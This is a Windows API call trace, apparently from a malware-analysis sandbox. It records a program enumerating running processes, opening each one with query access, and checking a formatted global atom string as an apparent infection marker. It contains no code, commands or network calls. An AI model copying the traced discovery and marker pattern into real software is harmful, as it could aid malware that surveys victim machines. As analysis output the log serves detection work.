	[0096.610] CloseHandle (hObject=0x248) returned 1
	[0096.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.610] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.610] CloseHandle (hObject=0x248) returned 1
	[0096.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.611] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.611] CloseHandle (hObject=0x248) returned 1
	[0096.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.611] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.611] CloseHandle (hObject=0x248) returned 1
	[0096.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658ee8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.611] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.611] CloseHandle (hObject=0x248) returned 1
	[0096.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658d68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.612] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.612] CloseHandle (hObject=0x248) returned 1
	[0096.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ac48, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.612] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.612] CloseHandle (hObject=0x248) returned 1
	[0096.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.612] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.612] CloseHandle (hObject=0x248) returned 1
	[0096.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658920, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.613] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.613] CloseHandle (hObject=0x248) returned 1
	[0096.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658f08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.613] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.613] CloseHandle (hObject=0x248) returned 1
	[0096.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.613] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.613] CloseHandle (hObject=0x248) returned 1
	[0096.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.614] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.614] CloseHandle (hObject=0x248) returned 1
	[0096.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658f08, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.614] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.614] CloseHandle (hObject=0x248) returned 1
	[0096.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.614] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.614] CloseHandle (hObject=0x248) returned 1
	[0096.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.615] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.615] CloseHandle (hObject=0x248) returned 1
	[0096.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.615] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.615] CloseHandle (hObject=0x248) returned 1
	[0096.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0096.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.615] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.615] CloseHandle (hObject=0x248) returned 1
	[0096.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.616] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.616] CloseHandle (hObject=0x248) returned 1
	[0096.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.616] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.616] CloseHandle (hObject=0x248) returned 1
	[0096.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.616] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.616] CloseHandle (hObject=0x248) returned 1
	[0096.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.617] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.617] CloseHandle (hObject=0x248) returned 1
	[0096.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658de8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.617] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.617] CloseHandle (hObject=0x248) returned 1
	[0096.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658970, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0096.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.617] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.617] CloseHandle (hObject=0x248) returned 1
	[0096.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c68, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0096.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.618] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.618] CloseHandle (hObject=0x248) returned 1
	[0096.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.618] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetLastError () returned 0x5
	[0096.619] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.619] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.619] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.620] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.621] GetLastError () returned 0x5
	[0096.622] GetLastError () returned 0x5
	[0096.622] GetLastError () returned 0x5
	[0096.622] GetLastError () returned 0x5
	[0096.622] GetLastError () returned 0x5
	[0096.622] GetLastError () returned 0x5
	[0096.622] GetLastError () returned 0x5
	[0096.622] GetLastError () returned 0x5
	[0096.622] GetLastError () returned 0x5
	[0096.622] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.622] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.622] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.622] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.622] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.622] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.622] CloseHandle (hObject=0x248) returned 1
	[0096.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fe90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.623] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.623] CloseHandle (hObject=0x248) returned 1
	[0096.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ae08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.623] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.623] CloseHandle (hObject=0x248) returned 1
	[0096.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16638) returned 0xc0000004
	[0096.666] VirtualAlloc (lpAddress=0x0, dwSize=0x16738, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16738, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
